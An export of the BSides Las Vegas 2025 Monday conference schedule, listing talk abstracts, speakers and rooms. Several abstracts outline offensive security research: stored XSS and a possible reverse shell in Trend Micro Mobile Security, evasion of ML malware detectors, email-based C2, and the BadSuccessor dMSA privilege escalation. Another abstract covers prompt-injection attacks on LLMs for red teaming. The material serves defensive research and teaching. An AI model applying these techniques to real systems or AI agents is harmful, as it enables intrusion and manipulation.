2.0 -//Pentabarf//Schedule//EN PUBLISH PBHVUK@@pretalx.com -PBHVUK Opening Remarks, Monday en en 20250804T093000 20250804T093100 000100

Opening Remarks, Monday

Opening Remarks, Monday PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/PBHVUK/ Florentine A milqtst PUBLISH VSF8QE@@pretalx.com -VSF8QE From Me to We en en 20250804T093000 20250804T100000 003000

From Me to We

Outline (internal only) PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/VSF8QE/ Florentine A Bryson Bort PUBLISH D9GABH@@pretalx.com -D9GABH Who Scans the Scanner? Exploiting Trend Micro Mobile Security en en 20250804T100000 20250804T104500 004500

Who Scans the Scanner? Exploiting Trend Micro Mobile Security

This talk is the result of hands-on vulnerability research focused on Trend Micro’s enterprise-grade mobile security solution, TMMS. The project began with a simple question: Can the tools used to protect mobile devices be turned against themselves? That curiosity led to a series of discoveries, two of which Trend Micro acknowledged as confirmed security issues. The first vulnerability centers on unauthenticated access to TMMS's device report pages. These pages expose scan histories, app inventories, and device status, all accessible without any form of authentication. This flaw represents a significant breach of confidentiality, offering an attacker valuable insights about an organization’s device fleet and security posture. Digging deeper, I found that these unauthenticated reports also served as a perfect delivery channel for a stored cross-site scripting attack. By modifying the name of an app on an enrolled Android agent, a value later displayed in the web console, I was able to inject JavaScript directly into the report page. Since this page is rendered without sanitization and without login, the script executes in the browser of any administrator or user who accesses it. The final and most technically complex finding lies within the TMMS Android agent. While inspecting its scan routines via reverse engineering and dynamic testing, I identified a potential path to code execution. By altering function parameters in memory during an antivirus scan, it may be possible to invoke unintended behavior, including spawning a reverse shell. Although Trend Micro has not confirmed this issue, preliminary results suggest the feasibility of remote command execution through controlled memory manipulation, especially if initiated from a compromised server or malicious agent. My talk will take attendees through each phase of the research: from initial reconnaissance and passive analysis to deeper reverse engineering of the Android APK and memory manipulation during runtime. I will demonstrate how these flaws intersect and discuss the viability of chaining them into a full exploit path. The narrative will include recorded demos, such as viewing a report without credentials, triggering XSS via Android scan, and memory patching leading to command execution, to help make the technical impact tangible. Beyond showcasing vulnerabilities, I’ll reflect on disclosure, vendor response, and the implications for other mobile security products. Attendees will leave with a deeper appreciation for the risks hidden in trusted software, as well as techniques they can apply to analyze similar solutions. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/D9GABH/ Florentine A Lucas Carmo PUBLISH C9FNXW@@pretalx.com -C9FNXW Creating the Torment Nexus: Using Machine Learning to Defeat Machine Learning en en 20250804T110000 20250804T112000 002000

Creating the Torment Nexus: Using Machine Learning to Defeat Machine Learning

This talk was in collaboration with a colleague when working at dropbox, we wondered whether we could easily bypass AI malware detection methods. After spending three months researching the possibilities, I found that with only minor non-code changes that do not affect the functionality of the executable, we were able to reduce detection by ~99.9998% for well-known malware samples, as well as ~20-30% with Virustotal results. This discovery shocked us by how easy and simple it was to perform. As malware detection tools start to incorporate machine learning in their product, we hope that this talk can demonstrate that doing so requires heavy scrutiny and careful planning in order to not introduce greater vulnerabilities. This talk will demonstrate how the research was done to enable attendees to continue this research on their own. PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/C9FNXW/ Florentine A Noah Grosh PUBLISH TMTNLQ@@pretalx.com -TMTNLQ The Scene is Dead en en 20250804T113000 20250804T121500 004500

The Scene is Dead

I've been researching English speaking cybercrime for most of my entire career, since long before they started to self-identify as "the com", and I'm going to discuss the patterns I noticed across more than a decade of work. This stuff has implications for child safety, infosec work, and the wellbeing of the next generation of workers in the infosec industry. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/TMTNLQ/ Florentine A Allison Nixon PUBLISH LUY3SR@@pretalx.com -LUY3SR My friend Ben: solid employee, DPRK agent en en 20250804T140000 20250804T144500 004500

My friend Ben: solid employee, DPRK agent

## Act I: /r/paycheck: The pandemic and the rise of overemployment schemes. So we had a global pandemic. We all went home. Employers everywhere touted how productive and amazing teams were working remotely. We bought ring lights. We arranged books we never read by color on bookshelves behind our desks. We realized we could get jobs at four different firms simultaneously and outsource our work overseas to four different people. We touched grass and made sourdough loaves. This is where we start our story. ###In this section: **1. Rational actors and their convert subcontractors.** Discussion of the abuses seen in remote work pre-pandemic, typically through illicit subcontracting, which is still endemic in tech. We’ll discuss the economics of the incentive model in the world of contractors. This laid the groundwork for various forms of workforce infiltration, including my friend Ben. **2. Exploit hiring practices with this one weird trick.** We will document the rise of overemployment or job stacking, which exploits weaknesses in typical corporate management styles. The combination of manager’s inability to identify low-performers, and HR’s requirements over progressive discipline pretty much guarantee 9-12 months of income for little effort. This realization is not lost on North Korea. ## Act II: My friend Ben: Understanding the threat of workforce infiltration. *(CFP NOTE: This is a TLP:CLEAR discussion. This part of the talk is where I have to be very careful about how I handle public and nonpublic intel – there’s a TLP:RED analogue of this I can’t give in a venue like bslv. I want to be clear with the committee that everything in this section is the result of direct experience or public intel, and I will be changing some details to prevent jeopardizing ongoing LE operations or revealing information that needs to stay confidential.)* **1. Meet Ben, senior software engineer.** “Ben” is a persona. “Ben” has stolen identity of a real person, including name, address and social security number. I will be highlighting what I know about this persona, including: a. Common failures in background check and job history reporting. b. Fabulist resumes that don’t quite seem too good to be true, but good enough to make him stand out from the crowd. c. Location discrepancies – Ben always seems to move right after he gets a job and fills out the payroll paperwork. d. What Ben’s like as a co-worker. I discuss how his co-workers and manager saw him as staff member and teammate. Something was always a bit “off” but work was getting done. **2. Meet Ben, DRPK-affiliated actor.** Ben may have eventually run into issues due to some his work style quirks, but unbeknownst to him, a team responsible for managing Insider Risk was on the hunt for his workplace predecessors, the subs and stackers. a. In this section, I’ll talk about how Ben was found, via technical means used to identify people subcontracting their work, or job stackers who allowed sensitive data to cross outside of organizational boundaries. b. Once Ben is identified for who he is, my teams made uncovering OSINT about him a full-blown sport. I’ll describe how we learned more about him, his interests and how we found other alternate identities. **3. Ben’s supporting cast:** In this section, I will provide a technical overview of: a. Laptop farms and how they operate b. The use of on-shore sketchy datacenters for VPN tunneling c. The type of people who operate laptop farms and how they’re recruited. d. What we learned doing OSINT on a domestic-side farmer who doesn’t seem to have DRPK-level training in opsec. **4. So you’ve met your own Ben, now what?** Safely eradicating DRPK actors. This is where I want to equip people to handle situations like this, based on what I have learned directly and through discussions with industry peers hunting DRPK. This includes equipment bricking and recovery, working with your hapless contract hire firm, and coordinating with internal partners on response. ## Act III: Trust Issues: Helping people bring their authentic selves to work. *(This is where I’m going to switch to direct actions organization can take to reduce their risk in this space.)* **1. Hiring, identity proofing, authentication tips.** We will talk about typical processes for establishing a person’s identity and why most are not strong enough to prevent impersonation. We will discuss ways to improve processes, the cost / friction these methods introduce and how to navigate this in your organization. **2. Technical indicators:** These are much weaker indicators for DRPK, but can prove valuable in identifying stackers and subs. This includes things like remote access tooling, abnormal collaboration patterns, peer network topologies and hunting for out of band equipment, such as IP-based KVMs. **3. Presentation wrap-up, attendee to-do list.** This is where I answer the questions like “where do I get started?” and “what’s the most effective methods for improving our processes?” This includes: a. Equipment shipping logistics red flags b. Supplier engagement c. Internal stakeholder education and partnership. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/LUY3SR/ Florentine A Chris Merkel PUBLISH REVYEP@@pretalx.com -REVYEP Shedding Light on Web Isolation Technologies and Their Bypass Techniques: C2 Communication via Outlook Using SMTP and IMAP en en 20250804T150000 20250804T154500 004500

Shedding Light on Web Isolation Technologies and Their Bypass Techniques: C2 Communication via Outlook Using SMTP and IMAP

Web isolation is a technology that enhances security by eliminating the need for workstation HTTP/HTTPS communication. During my experience as a SOC Analyst in a web isolation environment, many alerts were closed due to the blocking of HTTP/HTTPS traffic by firewalls. For instance, typical attacks like macro-enabled Word documents that download malware over HTTP can be entirely blocked by firewalls. This security solution is sometimes used by organizations such as banks, hospitals, and local governments that are large, long-established, and handle sensitive information. In web isolation environments, one of the few outbound communication methods permitted by firewalls is an email. However, tools that leverage email for C2 communication are uncommon, and therefore attract less attention compared to C2 traffic over HTTPS or DNS. As a result, they are sometimes overlooked by security teams and solutions. This presentation will demonstrate a C2 tool that uses email to show a viable threat scenario, even in web-isolated environments. The presentation will cover the following topics: 1. Web Isolation Technology - Overview of Web Isolation Technology - Threats and not threats for web-isolated environments 2. Actors and attack techniques utilizing SMTP/IMAP - Email collection techniques/Agent Tesla/Emotet/APT28 - C2 Tools which use SMTP/IMAP 3. Introduction and demonstration of the developed tool - Demo video - Comparison with general reverse shells - Detection results of AV/EDR products 4. Detection and mitigation - Setting to prevent this attack - Sigma rule and Splunk, Elastic, and EDR solutions PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/REVYEP/ Florentine A Terada Yu PUBLISH EMFVKN@@pretalx.com -EMFVKN The (Un)Rightful Heir: My dMSA Is Your New Domain Admin en en 20250804T170000 20250804T174500 004500

The (Un)Rightful Heir: My dMSA Is Your New Domain Admin

This research started as a curiosity: how do delegated Managed Service Accounts (dMSAs) really work under the hood in Windows Server 2025? What began as a weekend project led to the discovery of a novel attack path. The talk introduces BadSuccessor, an attack technique that lets an attacker gets the permissions of any user, including Domain Admins or Domain Controllers, and retrieve their Kerberos keys - all by using a newly created dMSA. No existing dMSAs needed, no membership changes, and no alterations to the legitimate account. We’ll go through the discovery process, what are dMSAs, how migration from an old service account to a dMSA works, and how this logic can be used to get privileged tickets. We’ll also share practical detection ideas, plus pre- and post-exploitation tips for both red and blue teams. Live demos will be pre-recorded for reliability. The goal is to make every part of the technique clear and repeatable for defenders, researchers, and red teamers alike. Whitepaper: https://docs.google.com/document/d/1ac4qRSgVrFSCnQrBbgj-6VscOKU5mtIIVYEVjdbIzrY/edit?usp=sharing PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/EMFVKN/ Florentine A Yuval Gordon PUBLISH LBQDEB@@pretalx.com -LBQDEB Detecting, Deobfuscating, and Preventing Obfuscated Script Execution with Tree-sitter en en 20250804T180000 20250804T184500 004500

Detecting, Deobfuscating, and Preventing Obfuscated Script Execution with Tree-sitter

The research in this talk has been developed over the past year and a half, and I presented early iterations of this research at BSides SATX and BSides Austin in 2024. The basic premise behind it is that tree-sitter provides a unified API through which we can parse, query, traverse, and manipulate syntax trees in a plethora of different languages, allowing us to develop new kinds of scanning engines and deobfuscation toolkits. This talk greatly expands upon that research with the inclusion of a from-scratch AMSI provider DLL written in Rust that preprocesses obfuscated PowerShell scripts and can be configured to either block script execution entirely or to pass the deobfuscated results up the chain for further scanning by other providers on the system. This new AMSI provider also implements a custom Event Tracing for Windows (ETW) trace logging provider that logs the deobfuscated contents, allowing threat hunters and incident responders to have an instantaneous look at the deobfuscated script contents that takes script block logging to an entirely new level. This AMSI provider and its associated research has not been discussed or shown at any other conference, and BSidesLV will be the first public demonstration and discussion of it, if the talk were to be accepted. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/LBQDEB/ Florentine A David McDonald PUBLISH NDRTXH@@pretalx.com -NDRTXH From Help Desk to CISO en en 20250804T100000 20250804T104500 004500

From Help Desk to CISO

In the rapidly evolving field of cybersecurity, the journey from an entry-level IT role to a leadership position like Chief Information Security Officer (CISO) can be both challenging and rewarding. This talk, inspired by the career trajectory of Nicholas Carroll, a CISM certified Cybersecurity Instructor and former CISO, aims to provide a roadmap for those aspiring to climb the cybersecurity career ladder. The talk will begin with an overview of Nicholas Carroll's career, highlighting his transition from an IT Helpdesk role to a CISO. The talk will also highlight how skills gained outside of IT and cyber can help translate to success in technical fields whether it be troubleshooting as a mechanic, customer service skills in retail, and beyond. This real-life example will serve as a testament to the possibilities that exist within the field of cybersecurity, demonstrating that with dedication, continuous learning, and the right opportunities, one can rise from an entry-level position to a leadership role. One of the key takeaways from this talk will be the importance of continuous learning and certifications in advancing one's career. Staying up-to-date with the latest trends, technologies, and threats is crucial. Certifications like CompTIA Security+, Certified Information Systems Security Professional (CISSP), and Certified Information Security Manager (CISM) not only validate one's skills but also open doors to new opportunities. We’ll also discuss the pitfalls and limitations of certifications and how to balance the pursuit of continuous education in cost effective ways throughout a career. The talk will delve into career guidance toolsets including the Cyber Career Pathways Tool, a resource developed by the Cybersecurity and Infrastructure Security Agency (CISA). This tool helps individuals understand the tasks, knowledge, and skills they need to advance in their cyber careers. It provides a clear roadmap for progression, from entry-level roles to intermediate and advanced positions. Another major takeaway will be the importance of hands-on experience. While theoretical knowledge is important, practical experience is what truly sets one apart. Attendees will learn about the value of internships, co-op programs, and entry-level positions in gaining this experience. Especially in a time when it feels like even entry level cyber jobs require years of experience. They will also learn about the role of projects and contributions to open-source platforms in demonstrating their skills to potential employers and ways to highlight experience outside of cyber in ways that can translate to success in cyber career pathways. The talk will also emphasize the importance of soft skills in advancing one's career. As one moves up the ladder, skills like communication, leadership, and strategic thinking become increasingly important. Drawing from Nicholas Carroll's experience, the talk will provide tips on how to develop these skills and use them to influence decision-making and drive cybersecurity initiatives within an organization. The talk will conclude with practical recommendations for those looking to move up in their careers. Attendees will learn about the importance of mentorship and networking in opening doors to new opportunities. They will also gain insights into how to navigate the challenges that come with transitioning to new roles, and how to position themselves for leadership positions, even if they’re just starting out. In summary, "From Help Desk to CISO" is a comprehensive guide for anyone looking to advance their career in cybersecurity. Attendees will leave with a clear understanding of the steps they can take to move up the career ladder, and the tools and resources they can leverage to achieve their career goals. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/NDRTXH/ Florentine B Nicholas Carroll PUBLISH 7RCPG9@@pretalx.com -7RCPG9 Hack Your Network: Career Connections for Cyber Pros en en 20250804T110000 20250804T112000 002000

Hack Your Network: Career Connections for Cyber Pros

In the competitive world of cybersecurity, building a professional network is more than just a nice-to-have—it’s essential for career growth. While many professionals understand the importance of networking, they often focus too much on self-promotion rather than relationship-building. This session will focus on how to approach networking with authenticity, with the goal of building genuine connections that can lead to future job opportunities, collaborations, and career advancement. Participants will learn about the best practices for networking at events like BSides, where like-minded cybersecurity professionals gather to share knowledge and forge new relationships. Attendees will also explore strategies for using LinkedIn and other social media platforms to connect with industry leaders, while maintaining an authentic and helpful presence online. Mentorship plays a crucial role in career development, and this session will guide participants on how to find a mentor, engage in meaningful mentor-mentee relationships, and benefit from those connections. The session will also discuss the long-term nature of networking, emphasizing how to stay engaged with your professional network over time and continue adding value to others’ careers. By the end of the session, participants will walk away with actionable tips for building and maintaining a strong professional network that supports their growth as cybersecurity professionals. PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/7RCPG9/ Florentine B Heather Morris PUBLISH DQZHHX@@pretalx.com -DQZHHX Hire Ground Resume Reviews, Monday Lunch Break en en 20250804T130000 010000

Hire Ground Resume Reviews, Monday Lunch Break

Hire Ground Resume Reviews, Monday Lunch Break PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/DQZHHX/ Florentine B PUBLISH 8BKV37@@pretalx.com -8BKV37 Where’s Waldo? Why Recruiters Can’t Find You (and What To Do About It) en en 20250804T140000 20250804T144500 004500

Where’s Waldo? Why Recruiters Can’t Find You (and What To Do About It)

This is not a presentation. It’s a live, practical experience where the audience drives the session and learns by doing. Attendees will step into the recruiter’s seat and experience what it’s like to search for cybersecurity talent. I’ll run a real-time LinkedIn search using a job title and location chosen by the audience. We’ll review the profiles that show up, vote on who stands out, and talk through what worked and what didn’t. Along the way, I’ll explain how recruiters actually search using filters, keywords, and shortcuts most people never see. Most professionals don’t realise how easy it is to be invisible. They’ve got solid experience, but their titles are unclear, their profiles don’t reflect how hiring teams think, and they’re missing the signals that matter. This session is designed to close that gap. We’ll also run a live fix challenge using real profiles. It’s honest, interactive, and focused on action. The goal is for people to walk out of the room saying, “Now I understand what’s missing and how to fix it.” I’ve spent over 9 years in cybersecurity recruitment, helping companies hire and helping people get hired. This session brings that experience to life in a way that is engaging, direct, and built for real impact. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/8BKV37/ Florentine B Ricki Burke PUBLISH SWUABJ@@pretalx.com -SWUABJ Craps, Clout, and Career Chaos: The Game They Forgot to Explain en en 20250804T150000 004500

Craps, Clout, and Career Chaos: The Game They Forgot to Explain

In cybersecurity, career growth is more than just technical skill—it’s about communication, visibility, and learning how to navigate organizational structures and politics. This dual-perspective presentation brings together the candid insights of a cybersecurity senior manager and a CISO, reflecting on the parallel (and sometimes diverging) paths they’ve taken. We will give real advice, honest stories of missteps, unexpected opportunities, and lessons learned the hard way, we’ll explore what it really takes to move forward in your cybersecurity career—from gaining trust and visibility to aligning with leadership’s expectations. Attendees will leave with actionable strategies for getting noticed, getting promoted, and making the leap from “getting the job done” to driving real influence. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/SWUABJ/ Florentine B Nicole Beckwith Jake Lorz PUBLISH PERW8U@@pretalx.com -PERW8U Hire Ground Resume Reviews, Monday Evening en en 20250804T160000 20250804T165000 005000

Hire Ground Resume Reviews, Monday Evening

Free resume reviews in Hire Ground. PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/PERW8U/ Florentine B PUBLISH TQDBBE@@pretalx.com -TQDBBE Hire Ground Mixer, Monday en en 20250804T170000 20250804T185000 015000

Hire Ground Mixer, Monday

Hire Ground Mixer, Monday PUBLIC CONFIRMED Event2HR https://pretalx.com/security-bsides-las-vegas-2025/talk/TQDBBE/ Florentine B PUBLISH SJHWP9@@pretalx.com -SJHWP9 Silent Auction Opens, Monday en en 20250804T083000 20250804T083000 000000

Silent Auction Opens, Monday

Silent Auction Opens PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/SJHWP9/ Florentine C+D PUBLISH MU7LC8@@pretalx.com -MU7LC8 Middle Ground Opens, Monday en en 20250804T083000 20250804T083000 000000

Middle Ground Opens, Monday

Middle Ground Opens PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/MU7LC8/ Florentine C+D PUBLISH MYMQJY@@pretalx.com -MYMQJY Morning Talks, Monday en en 20250804T100000 013000

Morning Talks, Monday

Morning Talks, Monday PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/MYMQJY/ Florentine C+D PUBLISH TTNWHR@@pretalx.com -TTNWHR Lunch Break, Monday en en 20250804T123000 20250804T140000 013000

Lunch Break, Monday

Lunch, Monday PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/TTNWHR/ Florentine C+D PUBLISH 99CFPY@@pretalx.com -99CFPY Afternoon Talks, Monday en en 20250804T140000 020000

Afternoon Talks, Monday

Afternoon Talks, Monday PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/99CFPY/ Florentine C+D PUBLISH ENKCZH@@pretalx.com -ENKCZH PvJ CTF Play Ends, Monday en en 20250804T160000 000000

PvJ CTF Play Ends, Monday

PvJ CTF Play Ends, Monday PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/ENKCZH/ Florentine C+D PUBLISH RZC7FH@@pretalx.com -RZC7FH Happy Hour, Monday en en 20250804T160000 20250804T170000 010000

Happy Hour, Monday

Happy Hour, Monday PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/RZC7FH/ Florentine C+D PUBLISH GH7XDX@@pretalx.com -GH7XDX PvJ CTF Hotwash, Monday en en 20250804T170000 20250804T173000 003000

PvJ CTF Hotwash, Monday

PvJ Hotwash, Monday PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/GH7XDX/ Florentine C+D PUBLISH GYHBD3@@pretalx.com -GYHBD3 Evening Talks, Monday en en 20250804T170000 20250804T190000 020000

Evening Talks, Monday

Evening Talks, Monday PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/GYHBD3/ Florentine C+D PUBLISH JSGWHZ@@pretalx.com -JSGWHZ Middle Ground Closes, Monday en en 20250804T190000 000000

Middle Ground Closes, Monday

Middle Ground Closes, Monday PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/JSGWHZ/ Florentine C+D PUBLISH E7XWHB@@pretalx.com -E7XWHB WhoAmI.exe - Can You Find The Threat? en en 20250804T190000 20250804T220000 030000

WhoAmI.exe - Can You Find The Threat?

Welcome to a high-stakes game of deception, deduction, and discovery! In this thrilling mystery-style tabletop experience, players take on unique character roles within a large corporation. The main characters include the CEO, IT Technician, CISO, Senior Analyst, and the intern. Each character contains a profile that hold their own secrets, motives, and hidden agendas. As the tension builds, each group will work together, or scheme against each other, to uncover the insider threat before it’s too late. Designed for 4-8 players per group, this immersive game challenges participants to analyze clues, interrogate suspects, and piece together the puzzle. Trust no one, question everything, and be prepared for unexpected twists, because in this game, the truth is never what it seems. Do you have what it takes to unmask the insider? PUBLIC CONFIRMED Training-4h https://pretalx.com/security-bsides-las-vegas-2025/talk/E7XWHB/ Florentine C+D Reanna Schultz Joshua Mason PUBLISH LTVBTF@@pretalx.com -LTVBTF Silent Auction Closes, Monday en en 20250804T190000 20250804T190000 000000

Silent Auction Closes, Monday

Silent Auction Closes PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/LTVBTF/ Florentine C+D PUBLISH EKFALC@@pretalx.com -EKFALC Board Game Night en en 20250804T190000 20250804T220000 030000

Board Game Night

Board Game Night PUBLIC CONFIRMED Event2HR https://pretalx.com/security-bsides-las-vegas-2025/talk/EKFALC/ Florentine C+D PUBLISH FFUHZJ@@pretalx.com -FFUHZJ BSLV Volunteer Reception en en 20250804T200000 20250804T220000 020000

BSLV Volunteer Reception

BSLV Volunteer Reception PUBLIC CONFIRMED Event2HR https://pretalx.com/security-bsides-las-vegas-2025/talk/FFUHZJ/ Florentine C+D PUBLISH ZCMBVR@@pretalx.com -ZCMBVR PvJ CTF Play Begins, Monday en en 20250804T090000 20250804T090000 000000

PvJ CTF Play Begins, Monday

PvJ CTF Play Begins, Monday PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/ZCMBVR/ Florentine E PUBLISH 9RELPE@@pretalx.com -9RELPE Beyond the Breach: Why Your Tabletop Exercise Should be Your Worst Nightmare en en 20250804T100000 20250804T104500 004500

Beyond the Breach: Why Your Tabletop Exercise Should be Your Worst Nightmare

Tabletop exercises are vital to the success of security within businesses, providing a simulated environment where teams can practice their responses to various scenarios. As someone who has written and conducted several of these exercises, I've observed common challenges that companies face during these sessions. One significant hurdle is the fear of failure; participants often worry about looking bad and are reluctant to embrace mistakes. However, I believe it's important to teach people that failure is not only acceptable but can actually contribute to creating a more secure environment. By learning from errors made during tabletop exercises, teams can strengthen their strategies and improve their overall security posture. Embracing a mindset where failure is seen as a stepping stone to success can transform the way businesses approach security, making them more resilient and prepared for real-world threats. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/9RELPE/ Florentine E Madison Rocha PUBLISH HKSUYW@@pretalx.com -HKSUYW Turbo Tactical Exploitation: 22 Tips for Tricky Targets en en 20250804T110000 20250804T112000 002000

Turbo Tactical Exploitation: 22 Tips for Tricky Targets

Modern penetration testing is no longer about running one big scan and waiting for low-hanging fruit to drop. It’s about speed, precision, adaptability, and the ability to recognize opportunity from noise. The faster a red team can identify viable paths to privilege or data, the more time they have to focus on meaningful exploitation—and the more value they deliver. This talk is built for speed. It’s a rapid-fire delivery of 22 tactical tips, designed for operators working against the clock and under pressure. Each tip targets a specific phase of a real-world engagement—covering everything from network recon to post-exploitation pivots—emphasizing tools, logic, and lateral thinking that yield fast results. The techniques in this session are grounded in real-world experience from assessments where time is short and the environment is unknown. These aren’t theoretical tactics—they’re the battle-tested shortcuts and field-proven workflows that separate successful engagements from an empty report. This session is for: * Penetration testers looking to sharpen their time-to-impact * Red teamers working inside constrained, high-pressure environments * Blue teamers wanting to understand how attackers think and move * Developers or sysadmins curious about how attackers prioritize and exploit their systems The primary goal is to arm attendees with fast, effective methods for: * Finding valuable targets with minimal noise * Recognizing indirect indicators of vulnerable systems * Pivoting across infrastructure and through segmentation * Avoiding tool fatigue and maximizing signal-per-effort This talk is structured as a guided sprint through the offensive lifecycle, starting from outside-in, to a foothold on an intermediate system, and finally to the most critical targets within the environment. Each tactic is immediately useful, often tool-agnostic, and focused on high leverage with low effort. PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/HKSUYW/ Florentine E HD Moore PUBLISH T7AHQT@@pretalx.com -T7AHQT Avoiding Credential Chaos: Authenticating With No Secrets en en 20250804T140000 20250804T144500 004500

Avoiding Credential Chaos: Authenticating With No Secrets

Tired of the secret sprawl? You're not alone. This talk throws out the outdated playbook of endless key rotations and credential tracking and exposes a better way: deleting the darn secrets in the first place. Or where they can’t be deleted, choose a solution that offers better protection as a matter of course. Learn concrete 'Do This, Not That' guidance for reducing secrets-induced risk across your stack, from how your users access infrastructure to how your services themselves authenticate. We’ll go through common use cases that traditionally require static, manually managed secrets, and give specific examples of how to move away from that model to a much safer and more maintainable architecture, where manually managed secrets are the exception, not the default. See a live demonstration of two Kubernetes clusters – one in AWS and one in Azure – securely authenticating to the other cloud provider with zero manually managed secrets. We'll dive into AWS IRSA and Azure Workload ID, showcasing how these services unlock cross-cloud access without the risk of static, privileged client credentials. You'll even get the full Terraform source code to implement this yourself, highlighting the emergent wins for resiliency and maintainability when your entire infrastructure is defined in code. Leave this session equipped with practical examples to immediately reduce your secrets footprint and a deeper understanding of building secure, secret-free systems. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/T7AHQT/ Florentine E Chitra Dharmarajan Steve Jarvis PUBLISH JJCREB@@pretalx.com -JJCREB Hacking Secure Coding Into Education en en 20250804T150000 20250804T152000 002000

Hacking Secure Coding Into Education

Join us as we share our journey bringing secure coding education to high school, university, and software engineering students. We’ll discuss the gaps in traditional programming education and how we addressed them through accessible, hands-on workshops. Discover our free GitHub repository and YouTube channel, packed with labs and walkthroughs. Learn how you can contribute—by suggesting ideas, building labs, reviewing code, or creating walkthrough videos—to help grow the secure coding community. PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/JJCREB/ Florentine E Or Sahar Yariv Tal PUBLISH 7BZSKL@@pretalx.com -7BZSKL Casting Light on Shadow Cloud Deployments en en 20250804T153000 20250804T155000 002000

Casting Light on Shadow Cloud Deployments

We developed this tool, and talk, after years of responding to incidents started from exposure of resources. The initial version supported AWS resource exposure investigation, and was presented at ShmooCon 2025. Since then, we are working on an integration of Google Cloud and increasing our coverage of AWS resources. This CLI tool has found success from practitioners in reducing the time spent during the identification phase of triage. While other tools support similar features, Luminaut stands separate by focusing on the discovery of resources and leveraging an inside-out approach for detection. Luminaut starts by enumerating internet facing network interfaces, tracing them to attached resources and services to identify what components construct the network path. It then uses available audit history from sources like CloudTrail and AWS Config to provide available context on how the resources were created. In addition to the internal identification, Luminaut can use external resources to gather information about services running on the exposed interfaces. This includes using nmap, whatweb, and shodan to provide information on applications or frameworks available at the exposed ports. Our project is available on GitHub here: https://github.com/luminaut-org/luminaut. In addition to the tool, our GitHub also hosts the documentation and our prior presentation slides. Our prior talk is available on YouTube here: https://youtu.be/-_jUZBMeU5w?si=e-Q3gFavTdhpecRY&t=16700 PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/7BZSKL/ Florentine E Brittney Argirakis Chapin Bryce PUBLISH 8EDXNE@@pretalx.com -8EDXNE Don't be LLaMe - The basics of attacking LLMs in your Red Team exercises en en 20250804T170000 20250804T174500 004500

Don't be LLaMe - The basics of attacking LLMs in your Red Team exercises

While this discussion will cover the basics of LLMs themselves, the primary focus is on how they can be used in the course of other offensive security work - particularly Red Team engagements. This presentation will begin with the core of how LLMs work at a theoretical level - no math or ML knowledge are required. Understanding how an LLM actually does what it does is critical to determining how to effectively manipulate or break it. After establishing the basics, we will cover common prompt injection strategies informed by real-world exercises. The specific focus will be on achieving impactful objectives common to Red Team engagements, like lateral movement, privilege escalation, or impact - getting the LLM to say something dirty only to you isn't exactly useful or concerning to the Red Team and falls into the alignment category, which is quality assurance more than offensive security. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/8EDXNE/ Florentine E Brent Harrell Alex Bernier PUBLISH HUP7L3@@pretalx.com -HUP7L3 .e'X'es and 'O'auths (They Haunt Me): In-Depth Analysis of OAuth/OIDC Misconfigurations and Token Replay Attacks en en 20250804T180000 20250804T184500 004500

.e'X'es and 'O'auths (They Haunt Me): In-Depth Analysis of OAuth/OIDC Misconfigurations and Token Replay Attacks

